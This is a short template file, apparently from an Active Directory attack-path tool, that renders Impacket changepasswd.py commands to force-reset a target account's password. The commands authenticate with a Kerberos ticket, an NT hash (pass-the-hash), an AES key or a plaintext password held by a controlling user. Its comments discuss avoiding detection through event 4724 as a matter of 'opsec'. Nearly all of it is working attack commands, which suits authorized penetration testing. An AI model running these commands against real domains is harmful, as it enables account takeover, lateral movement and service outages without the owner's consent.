# Change password of {{target.name}}, available protocols: smb-samr, rpc-samr, kpasswd.
# This action will generate a 4724 event on the domain controller that handled the
# request. This event may be centrally collected and analyzed by security analysts,
# especially for users that are obviously very high privilege groups (i.e.: Domain Admin
# users). Finally, by changing a service account password, you may cause that service to
# stop functioning properly. This can be bad not only from an opsec perspective, but also
# a client management perspective. Be careful!
{% if parent.krb_auth %}
changepasswd.py '{{fqdn}}/{{target.name}}@{{dc_name}}' -altuser '{{parent.obj.name}}' -k -no-pass -dc-ip {{dc_ip}} -protocol ldap -newpass '{{DEFAULT_PASSWORD}}' -reset
{%- elif parent.secret_type == T_SECRET_NTHASH %}
changepasswd.py '{{fqdn}}/{{target.name}}@{{dc_name}}' -altuser '{{parent.obj.name}}' -althash :{{parent.secret|red}} -dc-ip {{dc_ip}} -protocol ldap -newpass '{{DEFAULT_PASSWORD}}' -reset
{%- elif parent.secret_type == T_SECRET_AESKEY %}
changepasswd.py '{{fqdn}}/{{target.name}}@{{dc_name}}' -altuser '{{parent.obj.name}}' -k -no-pass -aesKey {{parent.secret|red}} -dc-ip {{dc_ip}} -protocol ldap -newpass '{{DEFAULT_PASSWORD}}' -reset
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
changepasswd.py '{{fqdn}}/{{target.name}}@{{dc_name}}' -altuser '{{parent.obj.name}}' -altpass '{{parent.secret|red}}' -dc-ip {{dc_ip}} -protocol ldap -newpass '{{DEFAULT_PASSWORD}}' -reset
{%- endif %}
